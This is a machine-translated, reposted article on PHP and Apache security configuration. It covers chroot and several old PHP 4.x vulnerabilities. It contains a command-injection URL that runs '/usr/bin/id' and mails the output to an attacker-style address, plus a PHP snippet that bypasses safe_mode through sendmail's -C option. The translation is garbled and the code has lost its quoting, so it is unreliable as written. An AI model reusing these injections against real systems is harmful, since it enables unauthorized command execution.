PHP Security Configuration: two key points for achieving security
Source: Internet
Author: User
PHP is actually a module function of the Web server. Therefore, you must first ensure the security of the Web server. Of course, to ensure the security of Web servers, we must first ensure the system security, so that we can go far and never go. PHP can be combined with various Web servers. here we only discuss Apache. We recommend that you use the chroot method to install and start Apache. 1. Web server security
PHP is actually a module function of the Web server. Therefore, you must first ensure the security of the Web server. Of course, to ensure the security of Web servers, we must first ensure the system security, so that we can go far and never go. PHP can be combined with various Web servers. here we only discuss Apache. We strongly recommend that you use the chroot method to install and start Apache. in this way, even if Apache and PHP and their scripts present vulnerabilities, only the banned system will be affected and the actual system will not be persecuted. However, the application of chroot Apache may also cause some trouble. for example, when connecting to mysql, you must use the 127.0.0.1 address to apply the tcp connection, instead of using localhost to implement socket connection, this is slightly less efficient. The mail function also sends emails as a title, because in php. ini:
[Mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
Sendmail_from = me@localhost.com
All are for the Win32 Platform, so you need to adjust sendmail in the chroot environment.
II. PHP title
1. remote overflow
All versions below PHP-4.1.2 have the remote buffer overflow vulnerability of file upload, and the attack program has been widely spread, the success rate is very high.
2. remote service rejection
PHP-4.2.0 and PHP-4.2.1 have PHP multipart/form-data POST pleading to handle remote vulnerabilities, although not to obtain local user permissions, but can also cause denial of service.
3. safe_mode bypass vulnerability
There are also below the PHP-4.2.2 version of the PHP mail function to bypass the safe_mode limit to fulfill the command vulnerability, 4.0.5 version of the beginning of the mail function added the fifth parameter, because the designer considers that he can break through the safe_mode restriction to execute the command. 4.0.5 breakthrough is very simple. you only need to use semicolons to separate and add shell commands. for example, the PHP script edevil. php exists:
Perform the following URL:
Http://foo.com/evil.php? Bar =;/usr/bin/id mail evil@domain.com
This sends the result of id fulfillment to the evil@domain.com.
For PHP from 4.0.6 to 4.2.2, breaking through the safe_mode restriction actually uses the-C parameter of sendmail, so the system must apply sendmail. The following code breaks through the safe_mode restriction to execute the command:
# Note: The following two must not exist, or their owner is the same as the owner of the script:
$ Script =/tmp/script123;
$ Cf =/tmp/cf123;
$ Fd = fopen ($ cf, w );
Fwrite ($ fd, OQ/tmp
Sparse = 0
R$ *. chr (9). $ # local $ @ $1 $: $1
Mlocal, P =/bin/sh, A = sh $ script );
Fclose ($ fd );
$ Fd = fopen ($ script, w );
Fwrite ($ fd, rm-f $ script $ cf ;);
Fwrite ($ fd, $ cmd );
Fclose ($ fd );
Mail (nobody,-C $ cf );
?>
You must upgrade PHP to the latest version.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
